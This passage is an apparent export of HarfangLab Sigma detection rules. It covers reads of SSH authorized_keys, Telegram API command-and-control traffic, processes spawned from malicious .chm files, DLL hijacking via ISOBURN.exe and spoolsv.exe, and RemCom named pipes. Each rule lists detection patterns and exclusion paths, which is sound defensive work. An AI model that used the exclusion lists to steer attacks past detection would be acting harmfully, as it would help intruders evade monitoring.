"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.641796Z",
"creation_date": "2026-03-23T11:45:34.596830Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596837Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1484/",
"https://attack.mitre.org/techniques/T1098/004/"
],
"name": "t1021_004_ssh_authorized_keys_read_linux.yml",
"content": "title: SSH Authorized Keys Read\nid: d5bec053-13ac-498d-8233-c20cac8072d1\ndescription: |\n Detects an attempt to read the content of ~/.ssh/authorized_keys.\n This file contains the list of SSH keys that are allowed to connect to that account.\n Reading this file can therefore be an attempt to discover new hosts or facilitate lateral movement.\n It is recommended to look for other malicious actions the ancestors processes may have taken.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1484/\n - https://attack.mitre.org/techniques/T1098/004/\ndate: 2022/11/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - attack.persistence\n - attack.t1098.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.SensitiveInformation\n - classification.Linux.Behavior.Lateralization\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n ProcessImage|contains: '?'\n - TargetPath:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_ssh:\n - ProcessImage|endswith: '/ssh'\n - ProcessParentImage|endswith: '/ssh'\n\n exclusion_sshd:\n - ProcessImage|endswith: '/sshd'\n - ProcessParentImage|endswith: '/sshd'\n\n exclusion_scp:\n - ProcessImage|endswith: '/scp'\n - ProcessParentImage|endswith: '/scp'\n\n exclusion_ssh_keygen:\n - ProcessImage: '/usr/bin/ssh-keygen'\n\n exclusion_common:\n ProcessImage:\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/systemd-tmpfiles'\n - '/usr/bin/file'\n - '/usr/bin/caja'\n - '/usr/bin/rpm'\n\n exclusion_opt:\n ProcessImage:\n - '/opt/eset/*'\n - '/opt/ds_agent/*'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/deepinstinct/bin/DeepManagementService'\n - '/opt/rudder/bin/cf-agent'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/opt/hpud/*/.discagnt/udscan'\n - '*/openv/netbackup/bin/bpbkar'\n - '/opt/sophos-av/engine/_/savscand.?'\n\n exclusion_yum:\n ProcessCommandLine:\n - '/usr/bin/python /bin/yum update'\n - '/usr/bin/python /bin/yum update -y'\n\n exclusion_puppetlabs:\n - ProcessImage|startswith: '/opt/puppetlabs/'\n - ProcessParentImage|startswith: '/opt/puppetlabs/'\n - ProcessCommandLine|startswith:\n - '/opt/puppetlabs/'\n - '/usr/bin/ruby /usr/bin/puppet agent '\n - ProcessAncestors|contains: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_clamscan:\n ProcessImage: '/usr/bin/clamscan'\n\n exclusion_mdatp:\n - ProcessParentImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - ProcessImage: '/opt/microsoft/mdatp/sbin/wdavdaemon'\n\n exclusion_zabbix:\n ProcessImage: '/usr/sbin/zabbix_agentd'\n\n exclusion_ureadahead:\n ProcessImage: '/sbin/ureadahead'\n\n exclusion_seahorse:\n ProcessImage: '/usr/bin/seahorse'\n\n exclusion_aide:\n ProcessImage|endswith: '/bin/aide'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_wazuh:\n ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_proxmox:\n ProcessImage:\n - '/usr/bin/proxmox-backup-client'\n - '/usr/local/sbin/proxmox-backup-client'\n\n exclusion_google_guest_agent:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_netwitness_logcollector:\n - ProcessCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n - ProcessParentCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n\n exclusion_tanium:\n ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_cfagent:\n - ProcessAncestors|contains: '/usr/sbin/cfexecd'\n - ProcessImage: '/usr/sbin/cfagent'\n\n exclusion_hive_client:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/local/bin/hive-client '\n - '/usr/bin/python?.? /usr/local/bin/hive-client '\n - '/usr/bin/python?.?? /usr/local/bin/hive-client '\n\n exclusion_nessus_scan:\n - ProcessParentCommandLine: 'sh -c printf \"command_start_%s\" \"*\"; *; printf \"command_done_%s\" \"*\"'\n - ProcessGrandparentCommandLine: 'sh -c printf \"command_start_%s\" \"*\"; *; printf \"command_done_%s\" \"*\"'\n\n exclusion_jumpcloud:\n ProcessAncestors|contains: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_oneautomation:\n ProcessAncestors|contains: '/oneautomation/*/smgr/bin/ucybsmgr|'\n\n exclusion_containerd:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_tripwire:\n ProcessImage: '/usr/sbin/tripwire'\n\n exclusion_gapplication_service:\n ProcessCommandLine|contains: '--gapplication-service'\n ProcessImage:\n - '/usr/bin/nautilus'\n - '/usr/bin/gedit'\n\n exclusion_cloudinit:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/bin/cloud-init '\n - '/usr/libexec/platform-python /usr/bin/cloud-init '\n\n exclusion_salt:\n - ProcessCommandLine:\n - '/usr/bin/python* /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-call *'\n - '/usr/libexec/platform-python /usr/bin/salt-call *'\n - ProcessImage: '/opt/saltstack/salt/bin/python?.??'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5bec053-13ac-498d-8233-c20cac8072d1",
"rule_name": "SSH Authorized Keys Read",
"rule_description": "Detects an attempt to read the content of ~/.ssh/authorized_keys.\nThis file contains the list of SSH keys that are allowed to connect to that account.\nReading this file can therefore be an attempt to discover new hosts or facilitate lateral movement.\nIt is recommended to look for other malicious actions the ancestors processes may have taken.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1098.004",
"attack.t1484"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082769Z",
"creation_date": "2026-03-23T11:45:34.082771Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082775Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf",
"https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1102_002_url_request_telegram_api.yml",
"content": "title: URL Request to Telegram API\nid: d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965\ndescription: |\n Detects URL requests to the Telegram API.\n Adversaries may use an existing, legitimate external Web service like Telegram Bot as a mean to sending commands to and receiving output from a compromised system over the Web service channel.\n It is recommended to investigate the process at the origin of the connection to determine whether he can legitimately communicate with Telegram API.\nreferences:\n - https://www.ncsc.gov.uk/files/NCSC-Malware-Analysis-Report-Small-Sieve.pdf\n - https://www.cloudsek.com/blog/breaking-into-the-bandit-stealer-malware-infrastructure\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/10/04\nmodified: 2025/04/29\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Behavior.NetworkActivity\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n RequestUrlHost: 'api.telegram.org'\n\n filter_telegram:\n ProcessSigned: 'true'\n ProcessSignature: 'Telegram FZ-LLC'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5ec5548-f8e7-4ca3-ba05-1cd2c00b7965",
"rule_name": "URL Request to Telegram API",
"rule_description": "Detects URL requests to the Telegram API.\nAdversaries may use an existing, legitimate external Web service like Telegram Bot as a mean to sending commands to and receiving output from a compromised system over the Web service channel.\nIt is recommended to investigate the process at the origin of the connection to determine whether he can legitimately communicate with Telegram API.\n",
"rule_creation_date": "2023-10-04",
"rule_modified_date": "2025-04-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d5f9a231-a605-4a0f-826e-513f92e27d3c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619275Z",
"creation_date": "2026-03-23T11:45:34.619277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619282Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MBThreatIntel/status/1561736526819639298",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_001_suspicious_process_parent_hh.yml",
"content": "title: Suspicious Process Started by hh.exe\nid: d5f9a231-a605-4a0f-826e-513f92e27d3c\ndescription: |\n Detects the execution of a suspicious process launched by hh.exe that can be the result of clicking a malicious .chm file.\n This is often the result of a phishing attack. This technique has been used by threat actors in an August 2022 campaign to deliver an AgentTesla payload.\n It is recommended to analyze both the grandparent process and the .chm file itself to look for malicious content, and to investigate further malicious actions stemming from hh.exe.\nreferences:\n - https://twitter.com/MBThreatIntel/status/1561736526819639298\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2022/09/29\nmodified: 2025/03/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Hh\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '\\hh.exe'\n\n exclusion_hh:\n CommandLine: '?:\\Windows\\hh.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n exclusion_splwow:\n CommandLine: '?:\\Windows\\splwow64.exe 8192'\n\n exclusion_browser:\n Image:\n - '?:\\Program Files*\\Microsoft\\Edge\\Application\\msedge.exe'\n - '?:\\Program Files*\\Mozilla Firefox\\firefox.exe'\n - '?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe'\n Signed: 'true'\n\n exclusion_adobe:\n Signature: 'Adobe Inc.'\n Signed: 'true'\n\n exclusion_spooler:\n Image: '?:\\Windows\\System32\\spool\\drivers\\x64\\3\\\\*.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d5f9a231-a605-4a0f-826e-513f92e27d3c",
"rule_name": "Suspicious Process Started by hh.exe",
"rule_description": "Detects the execution of a suspicious process launched by hh.exe that can be the result of clicking a malicious .chm file.\nThis is often the result of a phishing attack. This technique has been used by threat actors in an August 2022 campaign to deliver an AgentTesla payload.\nIt is recommended to analyze both the grandparent process and the .chm file itself to look for malicious content, and to investigate further malicious actions stemming from hh.exe.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-03-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d64960e1-ea00-454e-88a5-c1b8c9cffc38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078939Z",
"creation_date": "2026-03-23T11:45:34.078941Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078945Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_isoburn.yml",
"content": "title: DLL Hijacking via ISOBURN.exe\nid: d64960e1-ea00-454e-88a5-c1b8c9cffc38\ndescription: |\n Detects potential Windows DLL Hijacking via ISOBURN.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ISOBURN.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d64960e1-ea00-454e-88a5-c1b8c9cffc38",
"rule_name": "DLL Hijacking via ISOBURN.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ISOBURN.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6626a07-ebc3-45d0-a15c-029147b71685",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599099Z",
"creation_date": "2026-03-23T11:45:34.599102Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599110Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_spoolsv.yml",
"content": "title: DLL Hijacking via spoolsv.exe\nid: d6626a07-ebc3-45d0-a15c-029147b71685\ndescription: |\n Detects potential Windows DLL Hijacking via spoolsv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'spoolsv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DNSAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d6626a07-ebc3-45d0-a15c-029147b71685",
"rule_name": "DLL Hijacking via spoolsv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via spoolsv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d68bd5c7-1803-446c-9f61-a41bb1ba41f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078981Z",
"creation_date": "2026-03-23T11:45:34.078984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078990Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_radmin_named_pipe_creation.yml",
"content": "title: RemCom Named Pipe Created\nid: d68bd5c7-1803-446c-9f61-a41bb1ba41f5\ndescription: |\n Detects the creation of a Named Pipe pertaining to RemCom.\n RemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\n It is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\nreferences:\n - https://www.trendmicro.com/en_us/research/19/b/monero-miner-malware-uses-radmin-mimikatz-to-infect-propagate-via-vulnerability.html\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - attack.t1072\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Tool.RemCom\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: named_pipe_creation\n product: windows\ndetection:\n selection:\n PipeName|endswith: '\\RemCom_communicaton'\n\n # Exclusion for ADSelfService Plus\n # https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-remcomsvc-exe-is-detected-as-a-threat\n exclusion_adselfservice:\n # ADSelfService Plus use two backslashes in the command line\n ProcessCommandLine: '?:\\Windows\\\\\\\\RemComSvc.exe'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n # exclusion from the client side\n exclusion_manageengine_client:\n # ..\\bin\\RemCom.exe \\\\YYYYYY /user:xxxx\\Manage_Engine_AD /pwd:* wmic logicaldisk list brief /format:\"%WINDIR%\\System32\\wbem\\en-us\\csv\"\n ProcessImage|endswith: '\\ManageEngine\\ADAudit Plus\\bin\\RemCom.exe'\n\n exclusion_manageengine_bundle:\n ProcessImage|endswith:\n - 'UEMS_CentralServer\\bin\\RemCom.exe'\n - '?:\\Windows\\SysWOW64\\RemComSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ZOHO Corporation Private Limited'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d68bd5c7-1803-446c-9f61-a41bb1ba41f5",
"rule_name": "RemCom Named Pipe Created",
"rule_description": "Detects the creation of a Named Pipe pertaining to RemCom.\nRemCom is a Remote Management tool; it was created with the goal of replacing psexec. It uses Named Pipes mainly to self-replicate through the network.\nIt is recommended to determine if this tool is expected in your environment and to investigate any commands launched by RemCom.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1072",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d6c381a9-9a30-44bc-9ef4-59f6c33410b7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
